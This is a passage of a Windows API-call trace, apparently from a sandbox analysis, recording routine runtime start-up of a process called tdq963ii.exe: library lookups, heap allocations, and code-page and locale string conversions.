(hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0224.549] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0224.549] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0224.549] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0224.549] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0224.549] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0224.550] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0224.550] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0224.550] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0224.550] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0224.550] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0224.550] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0224.550] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0224.550] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0224.551] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0224.551] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x3da9e2e0, dwHighDateTime=0x1d68287)) [0224.551] GetCurrentThreadId () returned 0x710 [0224.551] GetCurrentProcessId () returned 0xafc [0224.551] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=34489040650) returned 1 [0224.552] GetProcessHeap () returned 0x8c0000 [0224.552] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0224.552] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0224.552] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0224.552] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0224.552] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0224.552] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0224.552] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0224.552] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0224.552] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0224.553] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0224.554] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0224.554] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0224.554] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0224.554] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0224.554] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0224.554] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0224.554] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0224.555] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0224.555] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0224.555] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0224.555] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0224.555] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0224.556] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x3bc) returned 0x8d60b0 [0224.556] GetCurrentThreadId () returned 0x710 [0224.556] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x18) returned 0x8d6478 [0224.556] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x800) returned 0x8d6498 [0224.556] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"Journal.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x3bcb9235, hStdError=0x0)) [0224.556] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0224.556] GetFileType (hFile=0x3) returned 0x2 [0224.556] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0224.557] GetFileType (hFile=0x80) returned 0x3 [0224.557] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0224.557] GetFileType (hFile=0xb) returned 0x2 [0224.557] GetCommandLineW () returned="tdq963ii.exe -accepteula \"Journal.exe\" -nobanner" [0224.557] GetEnvironmentStringsW () returned 0x8d6ca0* [0224.557] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0xb7e) returned 0x8d7828 [0224.558] FreeEnvironmentStringsW (penv=0x8d6ca0) returned 1 [0224.558] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0224.558] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x72) returned 0x8cf8d0 [0224.558] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0xa0) returned 0x8d6ca0 [0224.558] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x3e) returned 0x8d83c8 [0224.558] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x6c) returned 0x8d6d48 [0224.558] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x6e) returned 0x8d6dc0 [0224.558] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x78) returned 0x8cf950 [0224.558] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x62) returned 0x8d6e38 [0224.558] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x2e) returned 0x8d6ea8 [0224.558] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x48) returned 0x8d6ee0 [0224.558] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x22) returned 0x8d6f30 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x28) returned 0x8d6f60 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1a) returned 0x8d5a80 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x4a) returned 0x8d6f90 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x72) returned 0x8cf9d0 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x30) returned 0x8d6fe8 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x2e) returned 0x8d7020 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1c) returned 0x8d5aa8 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0xd2) returned 0x8d7058 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x7c) returned 0x8d7138 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x36) returned 0x8d71c0 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x3a) returned 0x8d8410 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x90) returned 0x8d7200 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x24) returned 0x8d7298 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x30) returned 0x8d72c8 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x36) returned 0x8d7300 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x48) returned 0x8d7340 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x52) returned 0x8d7390 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x3c) returned 0x8d8458 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x18) returned 0x8d73f0 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x82) returned 0x8d7410 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x2e) returned 0x8d74a0 [0224.559] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8d5ad0 [0224.560] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x2c) returned 0x8d74d8 [0224.560] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x54) returned 0x8d7510 [0224.560] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x52) returned 0x8d7570 [0224.560] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x2a) returned 0x8d75d0 [0224.560] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x3c) returned 0x8d84a0 [0224.560] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x54) returned 0x8d7608 [0224.560] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x24) returned 0x8d7668 [0224.560] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x30) returned 0x8d7698 [0224.560] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x8c) returned 0x8d76d0 [0224.560] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8d7828 | out: hHeap=0x8c0000) returned 1 [0224.561] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x800) returned 0x8d93b0 [0224.561] GetLastError () returned 0x0 [0224.561] SetLastError (dwErrCode=0x0) [0224.561] GetLastError () returned 0x0 [0224.561] SetLastError (dwErrCode=0x0) [0224.561] GetLastError () returned 0x0 [0224.562] SetLastError (dwErrCode=0x0) [0224.562] GetACP () returned 0x4e4 [0224.562] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x220) returned 0x8d9bb8 [0224.562] GetLastError () returned 0x0 [0224.562] SetLastError (dwErrCode=0x0) [0224.562] IsValidCodePage (CodePage=0x4e4) returned 1 [0224.562] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0224.562] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0224.562] GetLastError () returned 0x0 [0224.562] SetLastError (dwErrCode=0x0) [0224.562] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0224.562] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0224.562] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0224.562] GetLastError () returned 0x0 [0224.562] SetLastError (dwErrCode=0x0) [0224.562] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0224.562] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0224.563] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0224.563] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0224.563] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¥\x93Ë;äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0224.563] GetLastError () returned 0x0 [0224.563] SetLastError (dwErrCode=0x0) [0224.563] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0224.563] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0224.563] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0224.563] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0224.563] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ 